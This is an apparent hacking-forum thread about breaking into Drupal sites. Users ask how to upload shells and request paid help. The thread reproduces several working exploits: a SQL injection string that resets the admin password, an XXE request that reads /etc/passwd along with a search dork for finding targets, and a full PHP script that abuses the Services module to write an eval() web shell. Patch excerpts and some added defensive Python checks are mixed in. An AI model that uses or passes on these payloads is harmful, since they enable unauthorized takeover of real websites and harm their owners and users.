Can someone tell me how to upload a shell to this version, Drupal 6.22? I have admin access; the standard methods didn't help.
CVE-2014-3704 Drupal 7.0 – 7.31 pre-auth SQL Injection Vulnerability lol
https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

Code:
SektionEins GmbH
www.sektioneins.de

-= Security Advisory =-

Advisory: Drupal - pre-auth SQL Injection Vulnerability
Release Date: 2014/10/15
Last Modified: 2014/10/15
Author: Stefan Horst [stefan.horst[at]sektioneins.de]

Application: Drupal >= 7.0 <= 7.31
Severity: Full SQL injection, which results in total control and code execution of Website.
Risk: Highly Critical
Vendor Status: Drupal 7.32 fixed this bug
Reference: http://www.sektioneins.com/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

Overview:

Quote from http://www.drupal.org
"Come for the software, stay for the community
Drupal is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active and diverse community of people around the world."

During a code audit of Drupal extensions for a customer an SQL Injection was found in the way the Drupal core handles prepared statements.

A malicious user can inject arbitrary SQL queries. And thereby control the complete Drupal site. This leads to a code execution as well.

This vulnerability can be exploited by remote attackers without any kind of authentication required.

Details:

Drupal uses prepared statements in all its SQL queries. To handle IN statements there is an expandArguments function to expand arrays.

    protected function expandArguments(&$query, &$args) {
      $modified = FALSE;

      // If the placeholder value to insert is an array, assume that we need
      // to expand it out into a comma-delimited set of placeholders.
      foreach (array_filter($args, 'is_array') as $key => $data) {
        $new_keys = array();
        foreach ($data as $i => $value) {
          // This assumes that there are no other placeholders that use the same
          // name. For example, if the array placeholder is defined as :example
          // and there is already an :example_2 placeholder, this will generate
          // a duplicate key. We do not account for that as the calling code
          // is already broken if that happens.
          $new_keys[$key . '_' . $i] = $value;
        }

        // Update the query with the new placeholders.
        // preg_replace is necessary to ensure the replacement does not affect
        // placeholders that start with the same exact text. For example, if the
        // query contains the placeholders :foo and :foobar, and :foo has an
        // array of values, using str_replace would affect both placeholders,
        // but using the following preg_replace would only affect :foo because
        // it is followed by a non-word character.
        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

        // Update the args array with the new placeholders.
        unset($args[$key]);
        $args += $new_keys;

        $modified = TRUE;
      }

      return $modified;
    }

The function assumes that it is called with an array which has no keys. Example:

    db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));

Which results in this SQL Statement

    SELECT * from users where name IN (:name_0, :name_1)

with the parameters name_0 = user1 and name_1 = user2.

The Problem occurs, if the array has keys, which are no integers. Example:

    db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test -- ' => 'user1','test' => 'user2')));

this results in an exploitable SQL query:

    SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1

with parameters :name_test = user2.

Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can be used to insert arbitrary data in the database, dump or modify existing data or drop the whole database.

With the possibility to INSERT arbitrary data into the database an attacker can execute any PHP code through Drupal features with callbacks.

Patch:

    $new_keys = array();
    foreach (array_values($data) as $i => $value) {
      // This assumes that there are no other placeholders that use the same
      // name. For example, if the array placeholder is defined as :example
      // and there is already an :example_2 placeholder, this will generate
      // a duplicate key. We do not account for that as the calling code
      // is already broken if that happens.
      $new_keys[$key . '_' . $i] = $value;
    }

Proof of Concept:

SektionEins GmbH has developed a proof of concept, but was asked by Drupal to postpone the release.

Disclosure Timeline:

16. Sep. 2014 - Notified the Drupal devs via security contact form
15. Okt. 2014 - Release of Bugfix by Drupal core Developers

poc:

Code:
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

and it actually works, go ahead, hackers

exploit: http://pastebin.com/nDwLFV3v
video: http://www.youtube.com/watch?v=rHwJYD_yTlM
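The key handling that the advisory describes, next to the 7.32 fix, modeled in Python. This is an added example, not part of the post above and not Drupal's own code: `expand_arguments` and `unsafe_placeholders` are names invented here, PHP arrays are modeled as dicts, and the inputs are the advisory's two `db_query()` examples.

```python
import re

# A bound-parameter name may only be a colon followed by word characters.
PLACEHOLDER_RE = re.compile(r":\w+")


def expand_arguments(query, args, patched):
    """Model of Drupal's expandArguments() (hypothetical Python port).

    patched=False follows the 7.0-7.31 loop, where the array keys of the
    submitted value become part of the placeholder name; patched=True follows
    the 7.32 fix, which iterates over array_values($data) instead.
    """
    expanded = {}
    for key, data in args.items():
        if not isinstance(data, dict):  # scalar argument, nothing to expand
            expanded[key] = data
            continue
        values = list(data.values())
        suffixes = range(len(values)) if patched else list(data.keys())
        new_keys = {f"{key}_{s}": v for s, v in zip(suffixes, values)}
        # Same role as the preg_replace() call on $key in the PHP original.
        names = ", ".join(new_keys)
        query = re.sub(re.escape(key) + r"\b", lambda m: names, query)
        expanded.update(new_keys)
    return query, expanded


def unsafe_placeholders(args):
    """Return placeholder names that cannot be plain bound-parameter names."""
    return [name for name in args if not PLACEHOLDER_RE.fullmatch(name)]


# Inputs taken from the advisory's two examples.
QUERY = "SELECT * FROM {users} where name IN (:name)"
LIST_VALUE = {":name": {0: "user1", 1: "user2"}}
KEYED_VALUE = {":name": {"test -- ": "user1", "test": "user2"}}

if __name__ == "__main__":
    for label, patched in (("7.31", False), ("7.32", True)):
        for value in (LIST_VALUE, KEYED_VALUE):
            sql, bound = expand_arguments(QUERY, value, patched)
            print(label, "|", sql, "|", unsafe_placeholders(bound))
```

With the patched loop the placeholder names no longer depend on anything the client sent, so the check in `unsafe_placeholders` comes back empty for both inputs.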
Drupal 7.34 Admin PHP Object Injection https://websec.wordpress.com/2015/01/09/drupal-7-34-admin-php-object-injection/
Open redirect and authentication bypass. There are serious limitations in terms of exploitation.
https://www.drupal.org/SA-CORE-2015-001

Bypass (modules/user/user.module)

Before

PHP:
function user_pass_rehash($password, $timestamp, $login) {
  return md5($timestamp . $password . $login);
}

After

PHP:
function user_pass_rehash($password, $timestamp, $login, $uid) {
  // Backwards compatibility: Try to determine a $uid if one was not passed.
  // (Since $uid is a required parameter to this function, a PHP warning will
  // be generated if it's not provided, which is an indication that the calling
  // code should be updated. But the code below will try to generate a correct
  // hash in the meantime.)
  if (!isset($uid)) {
    $uids = array();
    $result = db_query_range("SELECT uid FROM {users} WHERE pass = '%s' AND login = '%s' AND uid > 0", $password, $login, 0, 2);
    while ($row = db_fetch_array($result)) {
      $uids[] = $row['uid'];
    }
    // If exactly one user account matches the provided password and login
    // timestamp, proceed with that $uid.
    if (count($uids) == 1) {
      $uid = reset($uids);
    }
    // Otherwise there is no safe hash to return, so return a random string
    // that will never be treated as a valid token.
    else {
      return drupal_random_key();
    }
  }

  return drupal_hmac_base64($timestamp . $login . $uid, drupal_get_private_key() . $password);
}

ORed (includes/bootstrap.inc)

PHP:
// Sanitize the destination parameter (which is often used for redirects)
// to prevent open redirect attacks leading to other domains. Sanitize
// both $_GET['destination'] and $_REQUEST['destination'] to protect code
// that relies on either, but do not sanitize $_POST to avoid interfering
// with unrelated form submissions. $_REQUEST['edit']['destination'] is
// also sanitized since drupal_goto() will sometimes rely on it, and
// other code might therefore use it too. The sanitization happens here
// because menu_path_is_external() requires the variable system to be
// available.
if (isset($_GET['destination']) || isset($_REQUEST['destination']) || isset($_REQUEST['edit']['destination'])) {
  require_once './includes/menu.inc';
  drupal_load('module', 'filter');
  // If the destination is an external URL, remove it.
  if (isset($_GET['destination']) && menu_path_is_external($_GET['destination'])) {
    unset($_GET['destination']);
    unset($_REQUEST['destination']);
  }
  // If there's still something in $_REQUEST['destination'] that didn't
  // come from $_GET, check it too.
  if (isset($_REQUEST['destination']) && (!isset($_GET['destination']) || $_REQUEST['destination'] != $_GET['destination']) && menu_path_is_external($_REQUEST['destination'])) {
    unset($_REQUEST['destination']);
  }
  // Check $_REQUEST['edit']['destination'] separately.
  if (isset($_REQUEST['edit']['destination']) && menu_path_is_external($_REQUEST['edit']['destination'])) {
    unset($_REQUEST['edit']['destination']);
  }
}
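What the `user_pass_rehash()` change buys, as an added Python example (not part of the post above and not Drupal's code): the old token depends only on the three inputs, while the new one is keyed with the site's private key and bound to one uid. The account rows and the private key are constructed sample values, `token_is_valid` is a hypothetical helper, and the encoding assumed for `drupal_hmac_base64()` is stated in the docstring.

```python
import base64
import hashlib
import hmac


def rehash_before(password_hash, timestamp, login):
    """md5($timestamp . $password . $login), as in the 'before' code."""
    return hashlib.md5(f"{timestamp}{password_hash}{login}".encode()).hexdigest()


def rehash_after(password_hash, timestamp, login, uid, private_key):
    """drupal_hmac_base64($timestamp . $login . $uid, $private_key . $password).

    Assumption: drupal_hmac_base64() is HMAC-SHA256, base64-encoded with
    '+' -> '-', '/' -> '_' and the '=' padding removed.
    """
    data = f"{timestamp}{login}{uid}".encode()
    key = f"{private_key}{password_hash}".encode()
    digest = hmac.new(key, data, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).decode().rstrip("=")


def token_is_valid(token, account, timestamp, private_key):
    """Constant-time check of a token against one specific account row."""
    expected = rehash_after(account["pass"], timestamp, account["login"],
                            account["uid"], private_key)
    return hmac.compare_digest(token, expected)


# Constructed sample rows: two accounts whose stored hash and last-login
# timestamp happen to be identical, which is the case the patch's
# backwards-compatibility branch refuses to resolve by guessing.
PRIVATE_KEY = "constructed-site-private-key"
ACCOUNT_A = {"uid": 7, "pass": "5f4dcc3b5aa765d61d8327deb882cf99", "login": 0}
ACCOUNT_B = {"uid": 8, "pass": "5f4dcc3b5aa765d61d8327deb882cf99", "login": 0}
TIMESTAMP = 1420070400


def tokens_for(account):
    """Return the (before, after) tokens for one account row."""
    before = rehash_before(account["pass"], TIMESTAMP, account["login"])
    after = rehash_after(account["pass"], TIMESTAMP, account["login"],
                         account["uid"], PRIVATE_KEY)
    return before, after


if __name__ == "__main__":
    for account in (ACCOUNT_A, ACCOUNT_B):
        print(account["uid"], *tokens_for(account))
```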
Pre-auth XXE in Drupal Services module, neat tricks to bypass restrictions inside
Detailed description (PDF): http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf

Code:
POST /drupal7.28/?q=test/node HTTP/1.1
[...]

<!DOCTYPE root [
<!ENTITY % evil SYSTEM "file:///etc/passwd">
%evil;
]>
<xml>
<test>test</test>
</xml>

Dork: "inurl:sites/all/modules/services/servers/rest_server/"
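A request-body parser that refuses the DOCTYPE this request depends on, as an added Python example (not part of the post above and not the Services module's code). `parse_untrusted_xml`, `is_acceptable` and `ForbiddenXML` are names invented here; the rejected sample is the body shown in the post and the accepted one is the same body without its DTD.

```python
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when a request body carries a DTD or an entity declaration."""


def parse_untrusted_xml(body):
    """Return {"path/to/element": text} for a body, refusing any DOCTYPE."""
    parser = expat.ParserCreate()
    values, path = {}, []

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Fires before any entity is declared or expanded.
        raise ForbiddenXML(f"DOCTYPE {name!r} is not allowed")

    def reject_entity(*declaration):
        raise ForbiddenXML("entity declarations are not allowed")

    def start(name, attributes):
        path.append(name)

    def end(name):
        path.pop()

    def text(data):
        if data.strip():  # ignore whitespace between elements
            key = "/".join(path)
            values[key] = values.get(key, "") + data

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text
    parser.Parse(body, True)
    return values


def is_acceptable(body):
    """True when the body parses and declares no DTD."""
    try:
        parse_untrusted_xml(body)
    except (ForbiddenXML, expat.ExpatError):
        return False
    return True


# The body from the post, and the same document without the DTD.
XXE_BODY = (b'<!DOCTYPE root [\n<!ENTITY % evil SYSTEM "file:///etc/passwd">\n'
            b'%evil;\n]>\n<xml>\n<test>test</test>\n</xml>')
PLAIN_BODY = b"<xml>\n<test>test</test>\n</xml>"

if __name__ == "__main__":
    print(is_acceptable(PLAIN_BODY), parse_untrusted_xml(PLAIN_BODY))
    print(is_acceptable(XXE_BODY))
```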
Hi everyone.
Drupal 6.20. An account with administrator rights.
The standard ways of uploading a shell don't help.
Who can suggest anything else?

What I tried:
1) Enabled PHP filter in the modules.
2) At site/admin/settings/filters/ => Access denied. You are not authorized to access this page. Which means I can no longer enable the php format, and accordingly, when adding blocks or pages, I can't select the php format... This method is a bust.
3) I can't upload themes.
4) There is imce. I upload php => it gets renamed to php_.txt. I upload .php3 => it gets downloaded. I upload .shtml - it opens normally, but only the HTML part is visible; the php code isn't executed, everything is interpreted as html.
5) I tried to upload, again through imce, an .htaccess so that php3 files wouldn't be downloaded. But no luck, it gets renamed to htaccess.

So I don't know what else to do. Who can suggest anything?
DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE

Vulnerability

One of the module's features is that the input/output format can be controlled by changing the Content-Type / Accept headers. By default, the following input formats are allowed:

application/xml
application/json
multipart/form-data
application/vnd.php.serialized

Code:
POST /drupal-7.54/my_rest_endpoint/user/login HTTP/1.1
Host: vmweb.lan
Accept: application/json
Content-Type: application/vnd.php.serialized
Content-Length: 45
Connection: close

a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}

Code:
HTTP/1.1 200 OK
Date: Thu, 02 Mar 2017 14:29:54 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Vary: Accept
Set-Cookie: SESSaad41d4de9fd30ccb65f8ea9e4162d52=ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I; expires=Sat, 25-Mar-2017 18:03:14 GMT; Max-Age=2000000; path=/; domain=.vmweb.lan; HttpOnly
Content-Length: 635
Connection: close
Content-Type: application/json

{"sessid":"ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I","session_name":"SESSaad41d4de9fd30ccb65f8ea9e4162d52","token":"2tFysvDt1POl7jjJJSCRO7sL1rvlrnqtrik6gljggo4","user":{"uid":"1","name":"admin","mail":"[email protected]","theme":"","signature":"","signature_format":null,"created":"1487348324","access":"1488464867","login":1488464994,"status":"1","timezone":"Europe/Berlin","language":"","picture":null,"init":"[email protected]","data":false,"roles":{"2":"authenticated user","3":"administrator"},"rdf_mapping":{"rdftype":["sioc:UserAccount"],"name":{"predicates":["foaf:name"]},"homepage":{"predicates":["foaf:page"],"type":"rel"}}}}

Exploit:

PHP:
#!/usr/bin/php
<?php
# Drupal Services Module Remote Code Execution Exploit
# https://www.ambionics.io/blog/drupal-services-module-rce
# cf
#
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
#    along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
#

# Initialization

error_reporting(E_ALL);

define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');

$url = 'http://vmweb.lan/drupal-7.54';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];

$browser = new Browser($url . $endpoint_path);


# Stage 1: SQL Injection

class DatabaseCondition
{
    protected $conditions = [
        "#conjunction" => "AND"
    ];
    protected $arguments = [];
    protected $changed = false;
    protected $queryPlaceholderIdentifier = null;
    public $stringVersion = null;

    public function __construct($stringVersion=null)
    {
        $this->stringVersion = $stringVersion;

        if(!isset($stringVersion))
        {
            $this->changed = true;
            $this->stringVersion = null;
        }
    }
}

class SelectQueryExtender {
    # Contains a DatabaseCondition object instead of a SelectQueryInterface
    # so that $query->compile() exists and (string) $query is controlled by us.
    protected $query = null;

    protected $uniqueIdentifier = QID;
    protected $connection;
    protected $placeholder = 0;

    public function __construct($sql)
    {
        $this->query = new DatabaseCondition($sql);
    }
}

$cache_id = "services:$endpoint:resources";
$sql_cache = "SELECT data FROM {cache} WHERE cid='$cache_id'";
$password_hash = '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd';

# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
$query =
    "0x3a) UNION SELECT ux.uid AS uid, " .
    "ux.name AS name, '$password_hash' AS pass, " .
    "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
    "ux.pass AS signature_format, ux.created AS created, " .
    "ux.access AS access, ux.login AS login, ux.status AS status, " .
    "ux.timezone AS timezone, ux.language AS language, ux.picture " .
    "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
    "WHERE ux.uid<>(0"
;

$query = new SelectQueryExtender($query);
$data = ['username' => $query, 'password' => 'ouvreboite'];
$data = serialize($data);

$json = $browser->post(TYPE_PHP, $data);

# If this worked, the rest will as well
if(!isset($json->user))
{
    print_r($json);
    e("Failed to login with fake password");
}

# Store session and user data

$session = [
    'session_name' => $json->session_name,
    'session_id' => $json->sessid,
    'token' => $json->token
];
store('session', $session);

$user = $json->user;

# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
$cache = unserialize($user->signature);

# Reassign fields
$user->pass = $user->signature_format;
unset($user->signature);
unset($user->signature_format);

store('user', $user);

if($cache === false)
{
    e("Unable to obtains endpoint's cache value");
}

x("Cache contains " . sizeof($cache) . " entries");


# Stage 2: Change endpoint's behaviour to write a shell

class DrupalCacheArray
{
    # Cache ID
    protected $cid = "services:endpoint_name:resources";
    # Name of the table to fetch data from.
    # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
    protected $bin = 'cache';
    protected $keysToPersist = [];
    protected $storage = [];

    function __construct($storage, $endpoint, $controller, $action) {
        $settings = [
            'services' => ['resource_api_version' => '1.0']
        ];
        $this->cid = "services:$endpoint:resources";

        # If no endpoint is given, just reset the original values
        if(isset($controller))
        {
            $storage[$controller]['actions'][$action] = [
                'help' => 'Writes data to a file',
                # Callback function
                'callback' => 'file_put_contents',
                # This one does not accept "true" as Drupal does,
                # so we just go for a tautology
                'access callback' => 'is_string',
                'access arguments' => ['a string'],
                # Arguments given through POST
                'args' => [
                    0 => [
                        'name' => 'filename',
                        'type' => 'string',
                        'description' => 'Path to the file',
                        'source' => ['data' => 'filename'],
                        'optional' => false,
                    ],
                    1 => [
                        'name' => 'data',
                        'type' => 'string',
                        'description' => 'The data to write',
                        'source' => ['data' => 'data'],
                        'optional' => false,
                    ],
                ],
                'file' => [
                    'type' => 'inc',
                    'module' => 'services',
                    'name' => 'resources/user_resource',
                ],
                'endpoint' => $settings
            ];
            $storage[$controller]['endpoint']['actions'] += [
                $action => [
                    'enabled' => 1,
                    'settings' => $settings
                ]
            ];
        }

        $this->storage = $storage;
        $this->keysToPersist = array_fill_keys(array_keys($storage), true);
    }
}

class ThemeRegistry Extends DrupalCacheArray {
    protected $persistable;
    protected $completeRegistry;
}

cache_poison($endpoint, $cache);

# Write the file
$json = (array) $browser->post(TYPE_JSON, json_encode($file));


# Stage 3: Restore endpoint's behaviour

cache_reset($endpoint, $cache);

if(!(isset($json[0]) && $json[0] === strlen($file['data'])))
{
    e("Failed to write file.");
}

$file_url = $url . '/' . $file['filename'];
x("File written: $file_url");


# HTTP Browser

class Browser
{
    private $url;
    private $controller = CONTROLLER;
    private $action = ACTION;

    function __construct($url)
    {
        $this->url = $url;
    }

    function post($type, $data)
    {
        $headers = [
            "Accept: " . TYPE_JSON,
            "Content-Type: $type",
            "Content-Length: " . strlen($data)
        ];
        $url = $this->url . '/' . $this->controller . '/' . $this->action;

        $s = curl_init();
        curl_setopt($s, CURLOPT_URL, $url);
        curl_setopt($s, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($s, CURLOPT_POST, 1);
        curl_setopt($s, CURLOPT_POSTFIELDS, $data);
        curl_setopt($s, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);
        $output = curl_exec($s);
        $error = curl_error($s);
        curl_close($s);

        if($error)
        {
            e("cURL: $error");
        }

        return json_decode($output);
    }
}

# Cache

function cache_poison($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
    cache_edit($tr);
}

function cache_reset($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, null, null);
    cache_edit($tr);
}

function cache_edit($tr)
{
    global $browser;
    $data = serialize([$tr]);
    $json = $browser->post(TYPE_PHP, $data);
}

# Utils

function x($message)
{
    print("$message\n");
}

function e($message)
{
    x($message);
    exit(1);
}

function store($name, $data)
{
    $filename = "$name.json";
    file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
    x("Stored $name information in $filename");
}

Everyone, update urgently =)
Source: here
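A pre-filter for the `application/vnd.php.serialized` input format described above, as an added Python example (not part of the post and not code from the Services module). It walks a PHP-serialized body without instantiating anything and passes it only when it contains no object (`O:` or `C:`) at any depth. All function names are invented here; `LOGIN_BODY` is the login body shown in the post and `OBJECT_BODY` is a constructed sample.

```python
SERIALIZED_TYPE = "application/vnd.php.serialized"
MAX_DEPTH = 16


def _read_int(buf, pos, terminator):
    end = buf.index(terminator, pos)
    return int(buf[pos:end]), end + 1


def _read_quoted(buf, pos):
    """Read LEN:"bytes" at pos; return (bytes, index after the closing quote)."""
    length, pos = _read_int(buf, pos, b":")
    end = pos + 1 + length
    if length < 0 or buf[pos:pos + 1] != b'"' or buf[end:end + 1] != b'"':
        raise ValueError("malformed string")
    return buf[pos + 1:end], end + 1


def _expect(buf, pos, byte):
    if buf[pos:pos + 1] != byte:
        raise ValueError(f"expected {byte!r} at offset {pos}")
    return pos + 1


def _walk(buf, pos, classes, depth):
    """Skip one serialized value; record the class name of every object."""
    if depth > MAX_DEPTH:
        raise ValueError("nesting too deep")
    tag = buf[pos:pos + 2]
    if tag == b"N;":
        return pos + 2
    if tag in (b"b:", b"i:", b"d:", b"r:", b"R:"):
        return buf.index(b";", pos) + 1
    if tag == b"s:":
        _, pos = _read_quoted(buf, pos + 2)
        return _expect(buf, pos, b";")
    if tag in (b"O:", b"C:"):
        name, pos = _read_quoted(buf, pos + 2)
        classes.append(name.decode("latin-1"))
        pos = _expect(buf, pos, b":")
        if tag == b"C:":  # custom-serialized object: opaque LEN:{data}
            length, pos = _read_int(buf, pos, b":")
            return _expect(buf, _expect(buf, pos, b"{") + length, b"}")
    elif tag == b"a:":
        pos += 2
    else:
        raise ValueError(f"unknown type tag at offset {pos}")
    count, pos = _read_int(buf, pos, b":")
    pos = _expect(buf, pos, b"{")
    for _ in range(count * 2):  # each entry is a key followed by a value
        pos = _walk(buf, pos, classes, depth + 1)
    return _expect(buf, pos, b"}")


def object_classes(payload):
    """Class names of every object a PHP-serialized payload would create."""
    classes = []
    if _walk(payload, 0, classes, 0) != len(payload):
        raise ValueError("trailing data after value")
    return classes


def allow_body(content_type, payload):
    """Pass non-serialized bodies; pass serialized ones only if object-free."""
    if content_type.split(";")[0].strip().lower() != SERIALIZED_TYPE:
        return True
    try:
        return object_classes(payload) == []
    except ValueError:  # malformed input is rejected, not forwarded
        return False


LOGIN_BODY = b'a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}'
# Constructed sample: the same array with an object where a string belongs.
OBJECT_BODY = b'a:2:{s:8:"username";O:8:"stdClass":0:{}s:8:"password";s:1:"x";}'
```

If no client of the endpoint needs the PHP-serialized format, rejecting that Content-Type outright is the simpler rule; the walker is for the case where it has to stay enabled.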
[QUOTE="leokomaro, post: 4079266, member: 302606"]can anyone help with a 6.22 on a paid basis?[/QUOTE]
https://cxsecurity.com/issue/WLB-2016070020
Does anyone know of another vulnerability for 6.22?
Guys,

Drupal 6.28, 2013-01-16
----------------------
- Fixed security issues (multiple vulnerabilities), see SA-CORE-2013-001.

is it realistic to hack this?
Tell me, is XML-RPC brute forcing possible in Drupal? In WP it's all extremely simple: you make an XML request with the parameters and everything works, but what are the parameters for Drupal? The information online is very old. If it's feasible, could I get an example?